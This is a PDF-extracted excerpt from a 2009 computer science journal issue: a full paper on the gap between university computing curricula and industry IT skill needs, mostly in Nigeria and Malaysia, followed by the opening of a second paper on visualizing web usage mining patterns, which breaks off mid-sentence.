This paper therefore sets out to examine theskills gaps between the industrial applicationof Information Technology and universityacademic programmes, look at some of thecauses, and in considering the probablesolutions for bridging the gap between themand suggests the possibilities of exploring anew role for our universities and employers of labor. The two sides, one producing and theother utilizing the work force, need a commonground to operate so that such synergy willresult in adequate supply of relevantpersonnel for all the sectors of the economy.
It is when such a balance is in sight that wemay begin to wrap our arms around resolvingthe issue of unemployment in the society.
2.0 UNIVERSITY ACADEMIC PROGRAMAND INDUSTRIAL APPLICATION OF IT
The subject of skills development is not onlytimely but appropriate in view of the presentglobal socio-economic challenges. The issueof skills gap is particularly topical considering
the structural, academic, vocational andplanning challenges which are peculiar to uspresently. No longer is the world debating onthe importance of education as a pre-requisite for social and economicdevelopment, and nobody now questions therelationship between high academicattainment and economic rewards thataccrue as a result of that attainment. Theformer President of the United States BillClinton once said “We are living in a world
where what you earn is a function of what you can learn. (US Dept. of Educ., 1995).
Exploration of the Gap Between Computer Science
Curriculum and Industrial I.T Skills Requirements.
Azeez Nureni Ayofe
Department of Maths & Computer Science,
College of Natural and Applied Sciences,
Fountain University, Osogbo,
Osun State, Nigeria.
E-mail address: nurayhn@yahoo.ca
Azeez Raheem AjetolaDepartment of Maths & Computer Science,
College of Natural and Applied Sciences,
Fountain University, Osogbo,
Osun State, Nigeria.
E-mail address: ajeazeez@yahoo.com
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
38 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 45/215
If this world is to move out of the presenteconomic doldrums, then its abundanthuman resources needed to be deployedeffectively and efficiently with the skill of Information Technology based processing tomanage other natural resources, in order toattain these developmental goals.IT Skills in all and every ramification
translate into inventions, services,products, ideas, innovations and bestpractices that drive the wheel of progressand development. From a studied position,the development of any nation depends to avery large extent on the caliber,organization and technological skill of itshuman resources.
In addition, it is widely held thatknowledge, skills, and resourcefulness of people are critical to sustaining economicand social development activities in aknowledge based society. Given the growingglobal IT networking and the dynamicinvestment climate in the world, thedemand for knowledge workers with highlevels of technical and soft skills can only
increase. IT knowledge and networkingskills is the arrowhead of the modern world
of work. All aspect of work is nowcomputerized. Only those who move with thetide will be successful.
However, the gap that exists between what istaught at school and the skills required toperform on a job is so wide that a highpercentage of young graduates are said to beunemployable for lack of needed skills that
would make them profitable for anyemployer. This state of affairs has existed inthe world especially in Africa for so long thatthere is urgent need for serious actions tostem the tide and correct the malaise that isrobbing the nation of progress in many fieldsof endeavour.
3.0 A TYPICAL SCENARIO
The table1 below shows the statistics of unemployed graduates in Malaysia asobtained in(http://educationmalaysia.blogspot.com/2006/07/70-public-university-graduates-
jobless.html), as demonstrated during aseminar in Malaysia on Education inMalaysia.
Table 1 shows the statistics of unemployed graduates in Malaysia (source:http://educationmalaysia.blogspot.com/2006/07/70-public-university-graduates-
jobless.html)
One of the contributors, Kian Ming, said “Ican fully understand "BusinessAdministration" or other managementprogrammes as a degree course that manycandidates opt for if they are not qualified
for other subjects to study, and hence the highlevel of unemployability given the weaker poolof students. However, computer science has thehighest contributor to the unemployed pool?Isn't that the next wave of growth overtaking
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
39 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 46/215
the country whereby computer sciencegraduates should be in high demand?”
Another participant in the same seminar, John Lee, also said “The answer as to whythe Computer Science faculty seems to becontributing the highest number of unemployed graduates to the market placedespite a clear shortage of skilled workersin the industry is fairly obvious.
A survey conducted earlier has indicatedthat as many as 30% of the unemployedlocal graduates are computer science andinformation technology degree holders.
These skills are in obvious demand in thecountry - it is not a mismatch. The clear-cut issue in this case is that many of thelocal institutions of higher learning, bothpublic and private have failed to offer asufficiently rigorous education to producethe necessary quality in the workforce
which the industry requires”
Most importantly, as highlighted by ChrisChan, chief executive officer of The MediaShoppe in the same seminar, he said:
“... some local ICT graduates lackedfundamental technical skills and only hadknowledge of basic software such asMicrosoft Office (!)
The problem is largely either the poor ICT curriculum of many of our localuniversities/colleges that doesn't seemteach anything to our ICT students or these
students shouldn't have been taking ICT courses in the first place”
4.0 WHAT IS A SKILL GAP? A skillgap is the shortage in performance. It is thedifference between what is required orexpected and what we actually get. Put inanother way a skill gap is the requiredperformance minus the presentperformance (Adetokunbo 2009). Hence it isalso called the performance gap. It couldbe in the area of any respective field of
work.
Causes of gap between the universitydegree in Computing and industrial ITskills
• The Computer Science curriculum isstatic in nature while its industrialapplication is dynamic.
• University is not ready to train andretrain its staff to meet up with the
dynamic nature of the course becauseof the financial implication.
• Lukewarm attitude of lecturers tosurrender themselves for training and
workshops that will expose them to thelatest innovations in IT.
• Priority given to research works by thelecturers rather than lectures and
workshops which will bring them tolimelight on the latest development inIT.
• Lack of facilities to train both thelecturers and the students on the newinventions
4.1 UNIVERSITY ACADEMIC PROGRAMME: This otherwise known as ‘Curriculum’ refers tocourse offerings at an educational institution.Decisions about what a school should teach areusually made by school administrators andfaculty and governed by University councils.In relation to Information Technology, it is of the view as it being too theoretical andoutdated. The necessary technical attributesand “Know-how” expected of this program is ina depleted state and close to nothingsatisfactory to applications in the Industrialrealm.
Answers are continuously left un-provided when students (graduates) are faced with thereality question of: “WHAT CAN YOU DO?” inthe labour market when they are out for anyinterview.
4.2 STUDENTS IN PERSPECTIVE It is clearly obvious that in university, studentsstudy the basics, that is, underline principles,
which might not be adequate to develop aprofessional project for a good client
Students do not know what a use case is; theyalso do not know how to prepare a professionalSRS. They equally do not know about the WBS.So how can they learn all these to preparethemselves joining a good satisfying job and
work
They should not think that they know in andout of software development the moment theyget a degree certificate from the university.
They must accept the fact that may be theyknow 10% or they just heard about all these
jargons during their student life. They shouldalso educate their parents not to pressurizethem just after their graduation rather to co-operate with them to learn and get ready for aright job.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
40 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 47/215
Why so many fresh IT or Computer Sciencegraduates in India could avail the job
within 6 months time from the graduationdate? They set their mind to join a goodtraining institute at least for 3 months timeafter the graduation where they learn thetechnology, communication and exposureon project management. This helps them alot to approach the big companies for a
junior software developer post as they learnthe live scenario of a project cycle during
their training period (Azeez N.A, 2008). They know how to code (technology), how todocument (communication) and how toprepare a release note (bit of projectmanagement). This is what any companyexpects from any IT graduate from day one.
They feel happy recruiting them as theydon’t have to spend money and timeproviding training to such a graduate anylonger.
44..33 CCAAUUSSEESS OOFF UUNNIIVVEERRSSIITTYY-- IINNDDUUSSTTRRYY GGAAPP IINN TTHHEE AARREEAA OOFF IINNFFOORRMMAATTIIOONN TTEECCHHNNOOL L OOGGYY
Apart from skill obsolescence thatoccurs over time, there are other factorsthat cause these gaps. A major factor is the changing pattern of working in industries . The current trends in the worldof work such as globalization,commercialization, flexi-hour, deregulation,outsourcing, contract work, homework andfreelancing have led to marked changes inindustry structure. New definition, new
meaning, and new application of knowledgedrive all these changes. New technologicaldiscoveries have given rise to newindustries and new structuring of workitself. New forms of work structures whichare flexible, adaptable, less hierarchical,and multi-skilled and which encouragecontinuous learning are becoming sourcesof competitive advantage in industries.International competition for jobs and
workers has also intensified, leading to theglobal talent hunt for innovation-driven knowledge workers.
In addition, global organizations are finding themselves ill equipped to compete in the 21st Century because of lack of right skills in fresh graduates that are employed in the labor market ..
At a time when the global knowledge-basedeconomy places an ever-growing premiumon the talent, creativity, and efficiency of the workforce, business leaders talk of a
widening gap between the skill their
organizations need to grow and the capabilitiesof their employees. Finding the right candidatesto fill a growing list of vacant positions is anumber one concern of business leaders today.Research shows that the shifts in workforcedemographics affect the availability of labor tofill high-skilled jobs. Ironically, skill gapsresult from technological advancements.Therefore, in reality, organizations will always face some types of skill gaps all the time if the university curriculum does not adjust itself into
the computerized economy.
Lack of proper skills in the university students,re-skilling, poor facilities for IT skillsdevelopment , lack of planning, lack of coordination, confusion, mismanagement,inefficient application of scarce resources anddeficient value orientation and other perfidieshas greatly contributed to put our country in avery precarious job deficit.Information technological Training facilities arefew, uncoordinated and untargeted in thehigher institutions. Before the current global
economic crisis, the jobs deficit was alreadyhuge and unwieldy. The situation has nowbecome even more critical.
A respondent in a current research carried outcommented upon lack of teaching staff andadministrative difficulties in updating theuniversity programmes curriculum for IT education.Lack of technical expertise, costly IT equipments, costly maintenance andreplacement of equipments, have been some of the major impediments.
Another major problem has been the schools’ inability to keep abreast of fast changingdevelopments in industry and technology.
It was established earlier that a gap existsbetween subjects taught and the methods usedto teach these subjects, and the academicrequirements at higher education institutions.
4.4 DIMENSIONS OF SKILL GAP From the foregoing analysis, it becomes
obvious that there will always be a gap between
IT skills and the university degree inComputing regardless of the operativeeconomic system. The extent and life span of the gap depends on how fast universities adjustor update their curricular respond to structuralchanges, and the magnitude, composition andtime-lag in government intervention in thelabor market. Gaps therefore exist in variousforms at the aggregate, sectoral and individuallevels.Underlying this gap is inadequacy of theeducational curricula which is designed
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
41 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 48/215
without apparent regards for relevance inapplication of the industries. Aside fromthis, there is some lop-sidedness incurricula implementation. Frequentdiscontinuity in the university programimpact directly on the quality of skillssupplied. The short-term duration practicalexposure of students through the SIWES(Student Industrial Work ExperienceScheme) is generally ineffective. This isbecause most higher institutions do not
even have proper IT facilities.
4.5 CONSEQUENCES OF THE GAP The persistent existence of skills gap in theIT industries and universities has madedependence on importation of skilled
workers with its attendant cost inevitable(Adetokunbo, 2009).
The gap also results in a waste of humanresources and, therefore, unemployment.For example, banks in many parts of African countries usually purchase software
which they use in banks for transactionalpurposes from China or United States of America. Also, big companies equally dosame for smooth running of their day to dayactivities. This is sequel to lack of reliableIT personnel in many parts of the world totake over the challenge. Inappropriatelyskilled labor is deprived of participation inthe production process. This category of unemployed persons raises the noise levelof unemployment which in addition to itseconomic consequences also threatenssocial stability of the country.
4.6 BRIDGING THE SKILLS GAP
What then can be done to bridge this gap?What kind of education is required in orderto prepare our students for work in theindustries? What changes need to beimplemented in order to make universityprogrammes suitable for a true preparationfor work? What kind of program wouldensure that students possess the skillsnecessary to enable them to occupy the
jobs currently taken by expatriates?
The answer to this question evidently liesin exposing the students to the high-levelcognitive skills that are essential andrequired by industries. The following aresome of the solutions that have been foundto produce good results:
• Study IT Skills program: This isnormally either presented as astand-alone program or integrated
into subjects taught. IT Skills are reinforced,self-learning, lifelong learning, research skills,time management skills, critical thinking skillsetc. These components have been seen to bemost effective when they are woven into theuniversity curriculum rather than tacklingthem as stand-alone subjects.
In bridging the gap and/or reformingeducation, many countries have encounteredand addressed this issue by introducing a
strong technological component to theuniversity curriculum. This normally comes inmany different forms; prevalent among them isoffering students courses in IT, work attitudeand work ethic, followed by a subsequentplacement in industrial and commercial firms,
where they get firsthand experience in real work environment.
Successful programs have been implemented incountries like Australia, Canada, United States,and Britain. The success of such programs inthese countries is ensured by the existence of a
huge industrial sector, which works inpartnership with schools. Other countries haveopted to establish training centers, which have
workshops that give students real workexperience. These training centers are normallyset up, financed, and managed by the privatesector and schools pay fees for their studentsto use these centers. A successful example of this kind of programs can be seen in theBOCES program in New York State, and theChicago School-to-Work Program.
• Information Technology: This
program ensures that the student possessesadequate Knowledge of IT and has the skillsrequired to comfortably use it in his job.Knowledge and skills of IT are two componentsthat have been found to be essential to bothgroups of students; the one that joins the
workforce and the one that opts for highereducation.
Like every economic phenomenon, there areboth supply and demand sides to issuesrelating to skills. A major source of supply of skills is the educational system which is
defined by the totality of all formal educationalinstitutions providing one form of skillsdevelopment or the other ranging from thebasic, technical colleges, to tertiary institutionscomprising the various Universities,Polytechnics, Monotechnics and otherspecialized institutions providing highlyspecialized skills.
The curricula or training manualsbeing implemented by these variousinstitutions are developed either wholly by the
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
42 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 49/215
relevant coordinating commissions such asthe National Universities Commission {NUC}in case of the Universities, the NationalBoard for Technical Education {NBTE} forthe Polytechnics, or in conjunction withinternational agencies such as the ILO.Suffice it to say that the major target of theeducational system is to produce skillsrequired by the public and the organizedprivate sector.
• Government and the organizedprivate sector should also put in placearrangements for professional students of tertiary institutions to undergo short-termpractical training in their chosen vocationsthrough a Student Industrial WorkExperience Scheme [SIWES] inInformation Technology to enhance theirknowledge in the field.
There is an emerging group of skillsdevelopers in Information andCommunication Technology who can beplaced between institutional and private
developers. The emergence of this group isin response to developments in the ICT industry. Government should makepromotional efforts towards regulatingoperations in the IT sector to avoid possiblelop-sidedness and unhealthy practices thatcould mar the sector.
• Appropriate educational curricula This must be designed and implemented byour institutions of learning especially thetechnical colleges, polytechnics,monotechnics, universities and other
specialized training institutions. Thecurricula which must be relevant to thepeculiarities of our situation must addressmost importantly the current industrialdemands with the intention of making ouruniversity graduates of Computer Sciencerelevant in the IT industry.
• There is need to actively collaborateand involve employers of labor indeveloping appropriate IT skills to avoid thesituation whereby people trained in certainfield cannot utilize them while skills needed
by employers are non available or grosslyinadequate leading either to importation of foreign skills or outright incapacitation of the production process. Employers shouldbe involved in all forms and levels of skillsdevelopment ranging from curricula designand implementation, product / serviceresearch and development, funding, etc.
The need to institutionalize Entrepreneurship DevelopmentProgramme {EDP} and vocational training
in the educational curricula is also imperative.Happily enough, some institutions have alreadystarted this. These subjects should beincluded among the contents of the compulsorygeneral studies programme of all tertiaryinstitutions’ IT curricula.
• Dialogue between the universitiesand employers of labor;
An outline for a framework for fostering thepartnership for interaction between university
and employer, while some areas of positiveinteraction between university and employersexist in the forms of training programs, and
joint services geared at bridging the skill gaps, what is needed, however is a framework thataddresses the chronic skilled shortages in thelabor market. This no doubt will entail anintegrated strategy..4.7 EMPLOYERS’ PERSPECTIVE Employer-university interaction is currently characterizedby problem of skills mismatch between whatemployer want and what university can
provide. So the Universities must design aproper programme for the proper identificationof employers’ skills requirements. For a result-oriented dialogue therefore, and on the part of employers, they should do the following inorder to attain maximum benefits that will beaccrued in bridging the current gap betweenthe university curriculum of computer scienceand IT skill requirements in the industry:-.Educational Reform/Curriculum:Educational reform is the most important areain which university can aid in bridging this
gap. The rapidly changing needs of employersand the labor market affect curriculum.Adjusting the curriculum to rapidly changingneeds of employers and the labor market istherefore very imperative. In framing aninnovative curricular relevant to employers’ need for IT, universities must factor in thedynamics of modern trends, including ICT,globalization and technological changes.
Technology not only has given rise to vast newindustries, but the restructuring of work itself.New forms of work structures which areflexible, adaptable, less hierarchical, multi-
skilled, and continuous learning are becomingone of the major sources of competitiveadvantage of enterprises in IT industries.
ICT literacy: Literacy in ICT must become animperative of the educational process andintegrated into the curriculum at all levels of studies to match the challenges andopportunities before us. Our objective is toempower every citizen with the IT skills theyneed for life-long learning, both in the
workplace and in private life. Our citizens
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
43 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 50/215
must have the technical skills, confidence,and flexibility they need to adapt over thecourse of their lifetimes.
Industry’s needs: The drivers for adoptionof a productive dialogue withuniversity/working partnership withindustry on skill development in relation tothe curriculum include knowing theindustry’s skills requirements. What skillsmake graduate more employable? (These
may include, for example, in ComputerScience, a programmer is expected to be amastery of the following programminglanguages: Java, C++, C, DHTML, Oracle10g, ASP and CGI as well as C# for him tobe relevant and employable in the labourmarket.
Also, the following categories of professionals are expected to be able toperform the following functions:
1. A trained Software Engineer isexpected to know how to create,maintain and modify computer andsoftware programs such asoperating systems, communicationssoftware, utility programs, compilersand database handlers. They mayalso be able to evaluate newprogramming tools and techniquesand analyze current softwareproducts(http/www./scientist/223113A.htm).
2. Computer engineers are involved inthe installation, repair and servicingof computers and associatedequipment, or peripherals. Theymay sometimes be described asinformation technology (IT)hardware technicians, serviceengineers or computer systemsengineers(http/www./scientist/223113A.htm).
3. A hardware design engineer plans,designs, constructs and maintainsthe hardware equipment of computers. They may also monitorthe development of hardwareaccording to design, and carry outrepairs and testing of computerequipment and peripherals(http/www./scientist/223113A.htm).
4. A network/systems engineer designs,installs, analyses and implementscomputer systems/networks. Theymay also make sure that theexisting network is effective, and
work out how it should evolve tomeet new requirements of the
organization or business(http/www./scientist/223113A.htm).
The question now is, are these categories of professionals in Computing being trained toacquire the above skills? The answer is no, thiscan be clearly established base on the analysisdone above.
These are highly required to be taught in theuniversity but reverse is the case.
Employability of graduates: In order toovercome persistent mismatches betweengraduate qualifications and the needs of thelabor market, university programmes should bestructured to enhance directly theemployability of graduates and to offer broadsupport to the workforce more generally. ICT Skills are portable if the skills acquired aretransferable and can be used productively indifferent jobs, enterprises, both in the informaland formal economy. Emphasis should beplaced on entrepreneurship development to
make our graduates well equipped for self employment, innovation and creativeness.
5.0 CHALLENGES TO UNIVERSITIES The implication of many of the processes of globalization, knowledge redefinition, graduateemployability etc, is yet to be addressed bymost universities. The scale of the challengeshould however not be underestimated. Indeed,becoming a market-responsive organizationrequires a major change in university culture.It implies a strong sense of institutionalpurpose and redirection through re designing
the university academic curriculum theComputer Science graduate relevant in theirchosen field.
Governance, Management and Leadership.Universities have historically been run ascommunity of scholars. Governance andmanagement structures were collegial andcommittee-based, the Senate and the council
were representative, and therefore, large.Decision making, was as a result slow andnaturally conservative. The emergence of acompetitive mass market and global higher
education market is bringing this model of governance and management into question. If
we are to have a catalytic relationship betweenuniversity and the global and dynamic world of the industries it is vital for the universities totransform also into more dynamic institutions.In short, improved dialogue betweenuniversities and industries will not be readilyachieved by top down mechanisms at either theinstitutional or regional level. There is thus theneed for a flexible, responsive and agile
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
44 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 51/215
organization able to strike a workingpartnership with others.
5.1 BENEFITS TO THE UNIVERSITIES The US experience at developing the
‘knowledge workers’ is a good example todemonstrate that universities do play a vitalrole in driving growth in the moderneconomy. If this paper is fully read anddigested, the universities should getsufficient information on the skills needs of
the industries to convince them of theurgency in curriculum refurbishing. Still,there are clear benefits that will accrue tothem from this paper.
(1) They will have enhanced roleto participate in industrialeconomic development.
(2) They will have earmarkedfunding for specific projectsand research efforts frommore industries.
(3) They will have flexible plansto access research funding
through collaboration withindustries.
(4) They will have accessthrough enlargedprogrammes to real worldchallenges in the workplace;and have the satisfaction of contributing to market placesuccess and growth ideas.
(5) They will have access tomodern and sophisticatedequipment and facilities inresearch centers funded by
industries jointly orotherwise.
(6) The need will create worthwhile incentives to helprecruit, reward and retainresearch and facultymembers and mostimportantly to trainemployable graduate.
5.2 BENEFITS TO BUSINESS ANDINDUSTRIES
Some specific benefits of this paper also
lead to acquiring the industrial and thebusiness world advantages. These includethe following:
(1) There will be a steady andconstant supply of graduateand post-graduate talents,skilled in the needed areasfor employment.
(2) A pool of scientists andresearchers will be availableto undertake regular projects
that will keep the industriesabreast of innovations anddiscoveries.
(3) The availability of the latestresearch and technologicalinventions in the Nigerianmarket place would beguaranteed.
(4) Nigerian industrialists andacademicians will rub shoulders
with their internation
counterparts in intellectualnetworking.
(5) The need for constant upgradingof professional knowledgebecomes imperative forlecturers, staff and managementalike.
The foregoing in summary, underscores theneed to build partnerships between universitiesand industries in Information Technology andresearch-intensive sectors. Manymultinationals have established alliances with
academic institutions on specific initiativescovering faculty upgrading, consultancy,internships, curriculum revision workshops,research incubation, etc. aggregating thearchitects of the new global development ineducational sector.
Bridging the gap: Student efforts. In summary, students should find a
good training company where theyshould not spend more money and timebut can learn more professionally toaugment their degree certificates.
Fresh graduates must think and planabout their career whether to become aProgrammer, Business Analyst, ProjectManager, Architect or preparing thecareer in Sales & Marketing beforegraduation.
They must think about the career path – howto achieve their career goal within a certainnumber of years
6.0 RECOMMENDATIONS AND CONCLUSION
Whatever the format of education that will beagreed upon, the present researcher believesthat there are some important parameters thatneed to be established. These parameters callfor a paradigm shift from “Instruction” to“Learning” and from the “Sellers’ market” to the“buyers’ market” (UNESCO, 2001). This shiftalso calls for a solid and sustainedcollaboration between education and thecommunity. New partnerships would thereforeneed to be established, nurtured, and
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
45 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 52/215
maintained. For effective implementation, we need to ensure the following:-
• All universities should liaise withthe relevant industries to receiveindustrial knowledge to augment theclassroom lectures.
• University lecturers should bemotivated towards attending localand international workshops on thelatest IT innovations with theintension of transferring same
knowledge to their students.• University should encourage
students towards registration forcertifications in IT.
• To consider university education asa “preparation for life” and thereforeshould cover a wider spectrum of courses that will be relevant inindustry.
• The existing gap can also becorrected by reviewing the whole of the university curriculum(Information Technology), and by
preparing lecturers/instructors inline with the new curriculumbecause implementation is anotherchallenge when it comes tocurriculum review.
• Retraining of the existing teachingstaff and administrators andredefining/restructuring teacherpreparation programs in keeping
with the new requirements in IT.
• IT education is the minimumrequirement for survival in today’ssociety and should therefore be openfor universal access.
• Information Technology (IT) shouldbe integrated in all the subjects of the curriculum at primary,secondary and tertiary levels.
• The colleges of education and theUniversity will have to change the
way they prepare teachers inkeeping with the new requirements.Both in-service and pre-serviceprograms have to be developed toserve this purpose.
• The preparation of teachers has tostart as soon as possible as this is along term process.
• Also, we have to properly fund ouruniversities, quantitatively orqualitatively so that our citizenry,including our labor force, may besufficiently empowered withappropriate knowledge of 21st century skills and attitude for
effective participation in a verycompetitive global society of IT.
• Implement faculty improvementprograms to upgrade their caliber andlearn new technologies based onsuggestions of leading softwareindustrialists.
• Focus on industrial driven needs that will enhance the chance of universitygraduates rather than laying emphasismuch on the basis; that is, the
underlying principle of computing.• The gap between Industrial based
applications and university curriculumcan also be bridged if the curriculumcan be structured in ways that willconcur with the industrial applications
• Also, this can be achieved if computerscience courses related to applicationdevelopment such as programming canbe taken by professionals in such fieldthat are currently working in industry.
This will require adjustments to the curriculumand format of universities education. It will alsorequire universities to be more open toconstructive engagement with employers of labor itself, as well as encouraging them toshare their hands on experience with, andinspire university students while they are stillin school.On the hand, universities need significantfunding improvements for research, learningand related intellectual activities, intellectualfreedom, the scope to think and interact withacademics in many locations and
circumstances, articulate and operate semi-autonomously such that those who provide thefunding should not therefore believe that allthings related to their funding must be donetheir way at all time.
From the foregoing, it is obvious that bridgingthe skill gaps is not merely improving students’ competence in core fields of IT. Education withrelevant syllabuses and training in specificareas play crucial roles in achieving rapidchanges in updating technical and engineeringskills especially in making relevant the degree
in computing and IT skill demand in ourindustries.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
46 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 53/215
REFERENCES
[1] Avison, D., “The ‘Discipline’ of Information Systems: Teaching,Research, and Practice”, in Mingers,
J. and F. Stowell (eds.) InformationSystems: An Emerging Discipline?Maidenhead: McGraw-Hill, 1997,pp. 113-136.
[2] Clayton W. Barrows, John Walsh
“Bridging the gap” betweenhospitality managementprogrammes and the private clubindustry.
International Journal of Contemporary HospitalityManagement Year: 2002Volume: 14 Issue: 3 Page:120 – 127 ISSN: 0959-6119DOI:
[3] Jaylon Clayton and Monrosh K. F Cooperative Training Initiative: An
Assessment of ReciprocalRelationships between Universitiesand Industry in ProvidingProfessional Development. A Bookpublished in 2005, ISBN 3459.
[4] Gonzales, Lazaro.(1996) Competencies in two sectors in
which information technology (IT)asserts a strong influence:
Telecommunications andAdministration/offices.
Thessaloniki, Greece: CEDOFOP.
November
[5] Ivan T. Mosley “Computer Management InformationSystems and Computer ProductionSkills Needed by Industrial
Technology Graduates as Perceivedby Universities and Companies” Abook Published in 2006. ISBN 234-4
[6] Fawad Mahmood and MuhammadAamir,“Future information and
Communication Networks” : Major Trend and Projections for developingcountries,” Int’l Workshop on theFrontiers of Information Technology,Islamabad–Pakistan, December 23-24, 2003.
[7] Adetokunbo Kayode “Bridging theskills gap in Nigeria: Framework fordialogue between universities andemployers of labor” Presented at the24 TH CONFERENCE OF THE
ASSOCIATION OF VICE CHANCELLORSOF NIGERIAN UNIVERSITIESUNIVERSITY OF ILORIN, ILORIN,NIGERIA 2ND JUNE 2009.
[8] . Ivan T. Mosley “ComputerManagement Information Systems andComputer Production Skills Needed byIndustrial Technology Graduates asPerceived by Universities and
Companies”. Seminar paper presentedat University of PortHarcourt, Nigeria.
[9] www.edu.ng
[10] www.unilorin.ng
[11] http://ieeexplore.ieee.org, IEEEDigital Library
[12] Kolade Olayiwola “Overview of theNew undergraduate computer sciencecurriculum, Associate Chair for Educatio”. A book published in 2008.
[13] www.csta.acm.org
[14] http://educationmalaysia.blogspot.com/2006/07/70-public-university-graduates-jobless.html
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
47 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 54/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
Visualization of Mined Pattern and Its Human
Aspects
Ratnesh Kumar Jain, Dr. R. S. KasanaDepartment of Computer Science and Applications
Dr. H. S. Gour Central University
Sagar, MP, India.
jratnesh@rediffmail.com, irkasana7158.gmail.com
Dr. Suresh JainDepartment of Computer Engineering, Institute of
Engineering & Technology,
Devi Ahilya University, Indore, MP (India) suresh.jain@rediffmail.com
Abstract—Researchers got success in mining the Web
usage data effectively and efficiently. But representation of
the mined patterns is often not in a form suitable for direct
human consumption. Hence mechanisms and tools that can
represent mined patterns in easily understandable format
are utilized. Different techniques are used for pattern
analysis, one of them is visualization. Visualization canprovide valuable assistance for data analysis and decision
making tasks. In the data visualization process, technical
representations of web pages are replaced by user
attractive text interpretations. Experiments with the real
world problems showed that the visualization can
significantly increase the quality and usefulness of web log
mining results. However, how decision makers perceive
and interact with a visual representation can strongly
influence their understanding of the data as well as the
usefulness of the visual presentation. Human factors
therefore contribute significantly to the visualization
process and should play an important role in the design
and evaluation of visualization tools. This electronicdocument is a “live” template. The various components of
your paper [title, text, heads, etc.] are already defined on
the style sheet, as illustrated by the portions given in this
document.
Keywords-Web log mining, Knowledge representation,
Visualization, Human Aspects..
I. INTRODUCTION
The dictionary meaning of visualize is "to form a mentalvision, image, or picture of (something not visible or present tosight, or of an abstraction); to make visible to the mind or
imagination" [The Oxford English Dictionary, 1989]. Thediscovery of Web usage patterns would not be very usefulunless there are mechanisms and tools to help an analyst betterunderstand them. Visualization has been used very successfullyin helping people understand various kinds of phenomena bothreal and abstract. Hence it is a natural choice for understandingthe behavior of Web users. “The essence of InformationVisualization is referred to the creation of an internal model orimage in the mind of a user. Hence, information visualization isan activity that humankind is engaged in all the time”. [1]
Figure 1. Visualization Process
Visualization of the web usage data is a technique in which
mined data are represented graphically. In this process,
technical representations of web pages are replaced by user
attractive text interpretations.
A. VISUALIZATION TECHNIQUES
There are a large number of visualization techniques which
can be used for visualizing the data. In addition to standard
2D/3D-techniques, such as x-y (x-y-z) plots, bar charts, linegraphs, etc., there are a number of more sophisticated
visualization techniques (see fig. 2). The classes correspond to
basic visualization principles which may be combined in order
to implement a specific visualization system.
Figure 2. Classification of Visualization technique
Comp.
Rep. of
reality
Reality
User(s)
Picture
(s)
48 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 55/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
1) Geometrically Transformed Displays
Geometrically transformed display techniques aim at finding
“interesting” transformations of multidimensional data sets.
The class of geometric display techniques includes techniques
from exploratory statistics, such as scatter plot matrices and
techniques which can be subsumed under the term “projection
pursuit”. Other geometric projection techniques include
Projection Views, Hyperslice, and the well-known Parallel
Coordinates visualization technique.
.
Figure 3. Parallel Coordinate Visualization
Figure 4. Dense pixel displays (Courtesy IEEE)
2) Iconic Displays
Another class of visual data exploration techniques is the
iconic display techniques. The idea is to map the attributevalues of a multidimensional data item to the features of an
icon.
3) Dense Pixel Displays
The basic idea of dense pixel techniques is to map each
dimension value to a colored pixel and group the pixels
belonging to each dimension into adjacent areas. See figure 4.
4) Stacked Displays
Stacked display techniques are tailored to present data
partitioned in a hierarchical fashion. In the case of
multidimensional data, the data dimensions to be used for
partitioning the data and building the hierarchy have to be
selected appropriately. See figure 5.
B. INTERACTION AND DISTORTION TECHNIQUES
In addition to the visualization technique, for an effective data
exploration, it is necessary to use some interaction and
distortion techniques. Interaction techniques allow the data
analyst to directly interact with the visualizations and
dynamically change the visualizations according to the
exploration objectives and they also make it possible to relate
and combine multiple independent visualizations. Distortion
techniques help in the data exploration process by providing
means for focusing on details while preserving an overview of
the data. The basic idea of distortion techniques is to show
portions of the data with a high level of detail, while others are
shown with a lower level of detail.
Figure 5. Dimensional Staking display (Courtesy IEEE)
1) Dynamic Projections
The basic idea of dynamic projections is to dynamically
change the projections in order to explore a multidimensional
data set. A classic example is the GrandTour system [24],which tries to show all interesting two-dimensional projections
of a multidimensional data set as a series of scatter plots.
2) Interactive Filtering
In exploring large data sets, it is important to interactively
partition the data set into segments and focus on interesting
subsets. This can be done by a direct selection of the desired
